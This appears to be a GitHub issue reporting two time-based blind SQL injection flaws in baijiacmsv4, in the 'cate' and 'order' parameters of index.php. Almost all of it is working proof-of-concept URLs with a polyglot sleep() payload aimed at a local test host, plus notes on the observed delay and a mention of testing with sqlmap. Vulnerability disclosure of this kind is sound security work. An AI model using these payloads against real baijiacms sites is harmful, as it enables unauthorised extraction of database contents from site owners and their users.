This repository has been archived by the owner on Jul 21, 2022. It is now read-only.
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session.
You signed out in another tab or window. Reload to refresh your session.
0x1:description
Two time-based SQL blinds to get data。
0x02:POC
First:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
second:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&page=1&_=1546926470383
0x03:description
request the url:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
No time delay
Screenshot:
https://i.loli.net/2019/01/08/5c344a7845064.png
request the url:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(10)))v)/*'%2b(select(0)from(select(sleep(10)))v)%2b'%22%2b(select(0)from(select(sleep(10)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
time delay
Screenshot:
https://i.loli.net/2019/01/08/5c344afbc5d7d.png
Test with sqlmap:
https://i.loli.net/2019/01/08/5c344b46484a1.png
The text was updated successfully, but these errors were encountered: